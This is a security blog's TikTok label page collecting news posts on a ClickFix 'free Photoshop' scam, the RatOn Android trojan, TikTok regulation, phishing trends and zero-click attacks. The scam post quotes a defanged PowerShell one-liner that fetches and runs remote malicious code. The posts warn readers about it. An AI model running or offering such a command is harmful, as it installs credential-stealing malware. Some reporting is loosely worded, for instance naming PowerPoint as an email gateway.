Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label TikTok. Show all posts
User Security
malware Photoshop Scam Social Engineering TikTok User Security

TikTok 'Free Photoshop' Scam Steals User Data via Malicious Commands

 

A sophisticated scam targeting TikTok users is exploiting the platform's reach to steal personal data by promising free access to expensive software like Adobe Photoshop. Cybercriminals are using a social engineering technique called ClickFix to trick victims into executing malicious commands that install information-stealing malware on their systems.

The scam operates through TikTok videos that demonstrate seemingly simple technical tricks to activate premium software, including Adobe Photoshop, Microsoft Windows, Discord Nitro, and other popular applications. These videos instruct users to run specific PowerShell commands on their Windows devices, with instructions that appear to be legitimate software activation methods. One example command involves executing iex (irm slmgr[.]win/photoshop), which fetches and runs malicious code from remote servers.

ClickFix attacks differ significantly from traditional phishing campaigns by guiding users through the process of infecting their own devices rather than simply tricking them into clicking malicious links. This social engineering approach exploits users' familiarity with solving minor technical issues, CAPTCHA checks, and human verification processes, making the scam appear more legitimate. Microsoft research indicates that since 2024, ClickFix has been used in nearly half of all recorded cyberattacks, surpassing phishing in popularity among cybercriminals.

When users execute the provided commands, they unknowingly download and install AuroStealer, a Trojan malware specifically designed to harvest sensitive information. This infostealer collects passwords, browser credentials, authentication cookies, cryptocurrency wallet data, and other application credentials from infected systems. The malware establishes persistence through scheduled tasks and uses self-compiling techniques to inject shellcode directly into memory, evading detection by security tools.

TikTok's short-form content delivery system and reputation for hosting legitimate technical how-to content makes it an ideal platform for this type of scam. The platform's viral nature enables these malicious videos to accumulate hundreds of likes and reach thousands of viewers before detection, with cybersecurity researcher Xavier Mertens identifying the ongoing campaign. The campaigns have been active since at least May 2025, with marked increases in activity observed through October 2025.

Security experts strongly advise users never to run commands on their machines from TikTok or other social media networks. Because these commands are executed locally on user systems, many security tools and browsers cannot easily detect them, making prevention through user education critical. Organizations should implement PowerShell execution restrictions, monitor scheduled tasks, and block known malicious domains to protect against these threats.
Read more »
Trojan
Android cryptocurrency malware MFA NFC Ransomware RatON TikTok Trojan

RatOn Android Trojan Expands Into Full Remote Access Threat Targeting Banks and Crypto

 



A new Android malware strain called RatOn has rapidly evolved from a tool limited to NFC relay attacks into a sophisticated remote access trojan with the ability to steal banking credentials, hijack cryptocurrency wallets, and even lock users out of their phones with ransom-style screens. Researchers warn the malware is under active development and combines multiple attack methods rarely seen together in one mobile threat.

How It Spreads

RatOn is being distributed through fake websites designed to look like the Google Play Store. Some of these pages advertise an adult-themed version of TikTok called “TikTok 18+.” Once victims install the dropper app, it requests permission to install software from unknown sources, bypassing Android’s built-in safeguards. The second-stage payload then seeks administrator and accessibility permissions, along with access to contacts and system settings, giving it deep control of the device. From there, RatOn can download an additional component called NFSkate, a modified version of the NFCGate tool, enabling advanced relay attacks known as “ghost taps.”


Capabilities and Tactics

The trojan’s abilities are wide-ranging:

1. Overlays and ransomware screens: RatOn can display fake login pages to steal credentials or lock the device with alarming ransom notes. Some overlays falsely accuse users of viewing child exploitation content and demand $200 in cryptocurrency within two hours to regain access.

2. Banking and crypto theft: It specifically targets cryptocurrency wallets such as MetaMask, Trust Wallet, Blockchain.com, and Phantom. By capturing PIN codes and recovery phrases, the malware enables attackers to take over accounts and steal assets. It can also perform automated transfers inside George ÄŒesko, a Czech banking app, by simulating taps and inputs.

3. NFC relay attacks: Through NFSkate, RatOn can remotely use victims’ card data for contactless payments.

4. Remote commands: The malware can change device settings, send fake push notifications, send SMS messages, add contacts, record screens, launch apps like WhatsApp and Facebook, lock the phone, and update its target list of financial apps.

Researchers noted RatOn shares no code with other Android banking trojans and appears to have been built from scratch. A similar trend has been seen before: the HOOK trojan, another Android threat, also experimented with ransomware-style overlays.


Development and Targets

The first sample of RatOn was detected on July 5, 2025, with further versions appearing as recently as August 29, pointing to ongoing development. Current attacks focus mainly on users in the Czech Republic and Slovakia. Investigators believe the need for local bank account numbers in automated transfers suggests possible collaboration with regional money mules.


Why It Matters

RatOn’s integration of overlay fraud, ransomware intimidation, NFC relay, and automated transfers makes it unusually powerful. By combining old tactics with new automation, it raises the risk of large-scale theft from both traditional banking users and cryptocurrency holders.

Users can reduce exposure by downloading apps only from official stores, refusing risky permissions for unknown apps, keeping devices updated, and using strong multi-factor authentication on financial accounts. For cryptocurrency, hardware wallets that keep recovery phrases offline provide stronger protection. Anyone who suspects infection should immediately alert their bank and seek professional removal help.


Read more »
TikTok
China Data Regulation Europe GDPR Privacy Social Media TikTok

EU Fines TikTok $600 Million for Data Transfers to China

EU Fines TikTok $600 Million for Data Transfers to China

Regulators said that the EU has fined TikTok 530 million euros (around $600 million). Chinese tech giant ByteDance owns TikTok, which has been found guilty of illegally sending the private data of EU users to China and lack of compliance to ensure the protection of data from potential access by Chinese authorities. According to an AFP news report, the penalty— one of the largest ever issued to date by EU’s data protection agencies— comes after a detailed inquiry into the legitimacy of TikTok’s data transfer rules. 

TikTok Fine and EU

TikTok’s lead regulator in Europe, Ireland’s Data Protection Commission (DPC) said that TikTok accepted during the probe about hosting European user data in China. DPC’s deputy commissioner Graham Doyle said that “TikTok failed to verify, guarantee, and demonstrate that the personal data of (European) users, remotely accessed by staff in China, was afforded a level of protection essentially equivalent to that guaranteed within the EU,”

Besides this, Doyle said that TikTok’s failure to address the dangers of possible access to Europeans’s private data by Chinese authorities under China’s anti-terrorism, counter-espionage, and other regulations, which TikTok itself found different than EU’s data protection standards. 

TikTok will contest the decision

TikTok has declared to contest the heavy EU fine, despite the findings. TikTok Europe’s Christine Grahn stressed that the company has “never received a request” from authorities in China for European users’ data and that “TikTok” has never given EU users’ data to Chinese authorities. “We disagree with this decision and intend to appeal it in full,” Christine said. 

TikTok boasts a massive 1.5 billion users worldwide. In recent years, the social media platform has been under tough pressure from Western governments due to worries about the misuse of data by Chinese actors for surveillance and propaganda aims. 

TikTok to comply with EU Rules

In 2023, the Ireland DPC fined TikTok 354 million euros for violating EU rules related to the processing of children’s information. The DPC’s recent judgment also revealed that TikTok violated requirements under the EU’s General Data Protection Regulation (GDPR) by sending user data to China. The decision includes a 530 million euro administrative penalty plus a mandate that TikTok aligns its data processing rules with EU practices within 6 months. 

Read more »
web3 technology
Blockchain Technology decentralized apps Technology TikTok web3 technology

How Trust Can Drive Web3 Adoption and Growth

 




Web3 technology promises to transform the internet, making it decentralized, secure, and transparent. However, many people hesitate to adopt it due to a lack of trust in the technology. Building this trust requires clear explanations, user-friendly experiences, and a solid infrastructure.  


Social Media: A Gateway to Web3  

Platforms like TikTok have become key tools for introducing users to Web3. For example, Hamster Kombat, a cryptocurrency-based game, attracted over 300 million players using TikTok. The platform made it easy for users to learn about the game by sharing tutorials, guides, and strategies, building trust among new players.  

Similarly, SonicX, a popular tap-to-earn game, onboarded over two million users through TikTok. The team behind the game, Sonic SVM, simplified the process for users by creating automatic wallets and removing transaction fees, making it feel like a traditional app. These efforts demonstrate how social media can act as a bridge between Web2 and Web3, helping more people understand and use these technologies.  


Why Strong Infrastructure Matters  

While social media helps with onboarding, a dependable Web3 infrastructure is essential for long-term success. Powerloom, for example, offers a decentralized network of over 5,300 nodes that collect and update blockchain data in real time. This ensures that decentralized applications (dApps) and smart contracts always operate with accurate information. By eliminating outdated data risks, Powerloom strengthens user confidence in Web3 platforms.  


Blockchain and dApps: Trust-Building Tools  

At its core, blockchain technology ensures security and transparency. It uses decentralized networks and cryptography to prevent tampering with data. This builds trust, as users can rely on the integrity of the system.  

Decentralized applications (dApps) also play a vital role. Take Uniswap, for instance. Its open-source code is accessible to anyone for verification, and regular security audits ensure its reliability. Users can trade or add liquidity without needing approval, reinforcing the trustworthiness of the platform.  


Reputation Through Tokenization  

Tokenization brings another layer of trust by rewarding users with reputation tokens for positive actions. These tokens serve as a record of reliability and contributions, discouraging malicious activity. In decentralized marketplaces, they enable peer-to-peer reviews without depending on centralized authorities, making the system fairer and more transparent.  

Web3 technology has immense potential, but its adoption depends on trust. Social media, combined with secure infrastructure, transparent dApps, and reputation systems, can make this next phase of the internet more accessible and trustworthy. By focusing on these elements, Web3 can achieve its vision of a decentralized and user-driven digital world.  


Read more »
Trojan
Cyber Security Google AMP Phishing Attacks RATs Russia TikTok Trojan

Hackers Use Russian Domains for Phishing Attacks

Hackers Use Russian Domains for Phishing Attacks

The latest research has found a sharp rise in suspicious email activities and a change in attack tactics. If you are someone who communicates via email regularly, keep a lookout for malicious or unusual activities, it might be a scam. The blog covers the latest attack tactics threat actors are using.

Malicious email escapes SEGs

Daily, at least one suspicious email escapes Secure Email Getaways (SEGs), like Powerpoint and Microsoft, every 45 seconds, showing a significant rise from last year’s attack rate of one of every 57 seconds, according to the insights from Cofense Intelligence’s third-quarter report.

A sudden increase in the use of remote access Trojans (RATs) allows hackers to gain illegal access to the target’s system, which leads to further abuse, theft, and data exploitation.

Increase in Remote Access Trojan (RAT) use

Remcos RAT, a frequently used tool among hackers, is a key factor contributing to the surge in RAT attacks. It allows the attacker to remotely manipulate infected systems, exfiltrate data, deploy other malware, and obtain persistent access to vulnerable networks.

According to the data, the use of open redirects in phishing attempts has increased by 627%. These attacks use legitimate website functionality to redirect users to malicious URLs, frequently disguised as well-known and reputable domains.

Using TikTok and Google AMP

TikTok and Google AMP are frequently used to carry out these attacks, leveraging their worldwide reach and widespread use by unknowing users.

The use of malicious Office documents, particularly those in.docx format, increased by roughly 600%. These documents frequently include phishing links or QR codes that lead people to malicious websites.

Microsoft Office documents are an important attack vector due to their extensive use in commercial contexts, making them perfect for targeting enterprises via spear-phishing operations.

Furthermore, there has been a substantial shift in data exfiltration strategies, with a rise in the use of.ru and.su top-level domains (TLDs). Domains with the.ru (Russia) and.su (Soviet Union) extensions saw usage spikes of more than fourfold and twelvefold, respectively, indicating cybercriminals are turning to less common and geographically associated domains to evade detection and make it more difficult for victims and security teams to track data theft activities.

Read more »
Zero Click Attacks
Cyber Attacks Personal Data Social Media TikTok Zero Click Attacks

Stay Secure: How to Prevent Zero-Click Attacks on Social Platforms

Stay Secure: How to Prevent Zero-Click Attacks on Social Platforms

While we have all learned to avoid clicking on suspicious links and be wary of scammers, this week we were reminded that there are some silent threats out there that we should be aware of zero-click assaults.

Recent Incidents

As Forbes first reported, TikTok revealed that a few celebrities' accounts, including CNN and Paris Hilton, were penetrated by simply sending a direct message (DM). Attackers apparently used a zero-day vulnerability in the messaging component to run malicious malware when the message was opened. 

The NSA advised all smartphone users to turn their devices off and back on once a week for safety against zero-click assaults, however, the NSA accepts that this tactic will only occasionally prevent these attacks from succeeding. However, there are still steps you can take to protect yourself—and security software such as the finest VPNs can assist you.

TikTok’s Vulnerability: A Case Study in Zero-Click Exploits

As the name implies, a zero-click attack or exploit requires no activity from the victim. Malicious software can be installed on the targeted device without the user clicking on any links or downloading any harmful files.

This feature makes these types of attacks extremely difficult to detect. This is simply because a lack of engagement significantly minimizes the likelihood of hostile activity.

Cybercriminals use unpatched vulnerabilities in software code to carry out zero-click exploits, known as zero-day vulnerabilities. According to experts at security firm Kaspersky, apps with messaging or voice calling functions is a frequent target because "they are designed to receive and interpret data from untrusted sources"—making them more vulnerable.

Once a device vulnerability has been properly exploited, hackers can use malware, such as info stealers, to scrape your private data. Worse, they can install spyware in the background, recording all of your activity.

The Silent Threat

This is exactly how the Pegasus spyware attacked so many victims—more than 1,000 people in 50 countries, according to the 2021 joint investigation—without them even knowing it.

The same year, Citizen Lab security experts revealed that utilizing two zero-click iMessage bugs, nine Bahraini activists' iPhones were successfully infiltrated with Pegasus spyware. In 2019, attackers used a WhatsApp zero-day vulnerability to inject malware into communications via a missed call.

As the celebrity TikTok hack story shows, social media platforms are becoming the next popular target. Meta, for example, recently patched a similar vulnerability that could have let attackers to take over any Facebook account.

Protective Measures

Stay Updated
  • Regularly update your operating system, apps, and firmware. Patches often address known vulnerabilities.
  • Enable automatic updates to stay protected without manual intervention.
App Store Caution
  • Download apps only from official app stores (e.g., Google Play, Apple App Store). Third-party sources may harbor malicious apps.
  • Remove unused apps to reduce your attack surface.
Multi-Factor Authentication (MFA)
  • Enable MFA for all your accounts, especially social media platforms. Even if an attacker gains access to your password, MFA adds an extra layer of security.
  • Use authenticator apps or hardware tokens instead of SMS-based codes.
Beware of DMs
  • Be cautious when opening DMs, especially from unknown senders.
  • Avoid clicking on links or downloading files unless you’re certain of their legitimacy.
Media Files Scrutiny
  • Treat media files (images, videos, audio) with suspicion.
  • Avoid opening files from untrusted sources, even if they appear harmless.
No Jailbreaking or Rooting
  • Modifying your device’s software (jailbreaking/rooting) weakens security.
  • Stick to the official software to maintain robust defenses.
Read more »
TikTok
IPO Rubrik Startups Technology TikTok

The Tech Landscape: Rubrik, TikTok, and Early-Stage Startups


The idea that the public markets are not as exclusive to tech firms as some believed was reinforced by Rubrik's aggressive IPO pricing and the positive response it received from the public markets following its listing. If Rubrik's outcome is insufficient to end the deadlock, perhaps there is another issue at hand.

1. Rubrik’s IPO Triumph

Rubrik, a data management company, recently made waves by going public through an initial public offering (IPO). The reception was nothing short of remarkable, signaling a shift in sentiment toward tech startups. For years, the public markets seemed somewhat closed to these fledgling companies, but Rubrik’s success challenges that notion.

The IPO process is a litmus test for any company. It involves transparency, financial scrutiny, and investor confidence. Rubrik’s strong pricing and positive market response indicate that investors are willing to embrace tech startups, provided they demonstrate robust fundamentals and growth potential.

As Rubrik’s stock ticker symbol blinks across trading screens, it serves as a beacon for other startups eyeing the public markets. The message is clear: If you have a compelling product, a solid business model, and a vision for the future, the IPO route is viable.

2. TikTok’s Regulatory Quandary

TikTok, the viral short-form video platform, has been on a rollercoaster ride. Loved by millions for its entertaining content, it also faces regulatory hurdles. The United States government has demanded that TikTok divest from its parent company or face a ban. This move underscores the geopolitical complexities surrounding tech companies.

Why the scrutiny? TikTok’s Chinese ownership raises concerns about data privacy, national security, and censorship. As the app continues to captivate users globally, governments grapple with how to balance innovation and security. The TikTok saga serves as a cautionary tale for tech companies operating in a globalized world.

For startups, understanding regulatory landscapes is crucial. Navigating legal frameworks, data protection laws, and geopolitical tensions requires strategic foresight. TikTok’s experience highlights the need for transparency, compliance, and proactive engagement with regulators.

3. TechCrunch Early Stage Event

Tech Crunch hosted its annual Early Stage event. This gathering brought together startups, investors, and industry experts. The event’s focus? Empowering early-stage companies to thrive.

In Boston, where the event took place, entrepreneurs pitched their ideas, networked, and absorbed insights from seasoned veterans. The buzz around early-stage startups was palpable. Investors scouted for promising ventures, and founders honed their pitches.

Why does this matter? Early-stage support is the lifeblood of innovation. Startups need mentorship, capital, and exposure to flourish.

Read more »
Western nations
Cyber Security Cybersecurity Safety concerns threat TikTok Western nations

Tiktok Ban: China Criticizes a Proped Bill in the US Congress

China has criticized a proposed bill in the US Congress that could potentially lead to the banning of TikTok in the United States, labeling it as unfair. This action marks the latest development in a longstanding dispute over safety concerns regarding the popular app, which is owned by a Chinese company. Authorities, politicians, and security personnel in numerous Western nations have already been prohibited from installing TikTok on official devices.

Addressing three major cyber concerns surrounding TikTok, the first revolves around its data collection practices. Critics frequently accuse TikTok of gathering excessive amounts of user data, a claim supported by a cyber-security report published by Internet 2.0, an Australian firm, in July 2022. This report, based on an analysis of TikTok's source code, highlighted what it described as "excessive data harvesting," including details such as location, device specifications, and installed apps. However, contrasting studies suggest that TikTok's data collection practices are not significantly different from other social media platforms, with similar types of data being collected for user behavior tracking.

The second concern focuses on the potential for TikTok to be exploited by the Chinese government for espionage purposes. TikTok asserts its independence and denies providing user data to the Chinese government, emphasizing that such actions would not be entertained if requested. However, critics remain wary due to the app's ownership by ByteDance, a Beijing-based tech company. Allegations raised by former US President Donald Trump in a 2020 executive order suggested that TikTok's data collection could enable China to engage in espionage activities, although concrete evidence supporting these claims remains elusive.

The third concern revolves around the possibility of TikTok being utilized as a tool for "brainwashing" users. TikTok defends its community guidelines, stating that they prohibit misinformation and harmful content. However, concerns have been raised regarding the platform's recommendation algorithm and its potential susceptibility to influence operations. Comparisons with Douyin, TikTok's sister app available only in China, highlight disparities in content censorship. While Douyin reportedly promotes wholesome and educational content, TikTok's approach appears less stringent in terms of political censorship.

Overall, these concerns primarily exist as theoretical risks rather than concrete evidence of wrongdoing. Critics argue that TikTok could potentially serve as a covert instrument during times of conflict, akin to a "Trojan horse." However, decisions to ban TikTok, as seen in India in 2020, or restrict Chinese tech companies like Huawei from participating in 5G infrastructure development, are often based on these theoretical risks rather than tangible evidence. Conversely, China does not face similar concerns regarding US-based apps, as access to such platforms has been blocked for Chinese citizens for several years.
Read more »
Subscribe to: Comments (Atom)